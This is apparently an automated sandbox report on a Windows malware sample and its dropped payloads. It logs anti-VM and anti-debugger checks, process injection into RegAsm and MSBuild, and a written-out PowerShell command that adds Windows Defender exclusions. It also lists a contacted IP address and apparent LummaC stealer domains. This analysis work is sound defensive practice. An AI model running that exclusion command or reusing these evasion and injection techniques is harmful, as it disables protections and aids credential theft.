Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001CDB5E FindFirstFileExW,

26_2_001CDB5E

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001972F0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

26_2_001972F0

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 591496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 590804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 589711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 588630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 584595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 583277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 581637
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 580105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 578479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 576757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 574695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 572735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 570520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 566034
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 563979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 561729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 559187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 556505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 554105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 549013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 545765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 542766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 539749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 536749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 531088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 527853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 524644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 521393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 517771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 355523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 268824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 267590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597014
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592085
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 590992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 589911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 585876
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 584558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 582918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 581386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 579760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 578038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 575976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 574016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 571801
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 567315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 565260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 563010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 560468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 557786
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 555386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 550294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 547046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 544047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 541030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 538030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 532369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 529134
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 525925
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 522674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 519052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 343741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: bUWKfj04aU.exe, bUWKfj04aU.exe, 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: RegAsm.exe, 0000001D.00000002.2648072968.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QEMU_HARDU
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2567701880.000000000120A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2648072968.000000000129A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2648072968.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RegAsm.exe, 0000001D.00000002.2663231938.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/U
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: netsh.exe, 00000006.00000003.2206953966.00000223F0F66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Traffic.exe, 0000000F.00000002.2321334601.000000000270D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: bUWKfj04aU.exe, 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Enterprise without Hyper-V Full

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

API call chain: ExitProcess graph end node

graph_0-10275

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_052A097E Start: 052A099B End: 052A0995

0_2_052A097E

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_052A090C rdtsc

0_2_052A090C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 21_2_00435B70 LdrInitializeThunk,

21_2_00435B70

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001C6B6B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

26_2_001C6B6B

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001BC08C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

26_2_001BC08C

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_008F5E8B mov eax, dword ptr fs:[00000030h]	0_2_008F5E8B
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_008F9B02 mov eax, dword ptr fs:[00000030h]	0_2_008F9B02
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001CA292 mov eax, dword ptr fs:[00000030h]	26_2_001CA292
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001C661B mov eax, dword ptr fs:[00000030h]	26_2_001C661B

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001CEDB4 GetProcessHeap,

26_2_001CEDB4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001AD2DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_001AD2DC
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001C6B6B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_001C6B6B
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001ADCAA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_001ADCAA
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001ADE0F SetUnhandledExceptionFilter,	26_2_001ADE0F

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.32 80

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe

Code function: 10_2_02B0AE39 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

10_2_02B0AE39

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wifeplasterbakewis.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: mealplayerpreceodsju.shop
Source: gold.exe, 00000011.00000002.2298653868.0000000003815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bordersoarmanusjuw.shop
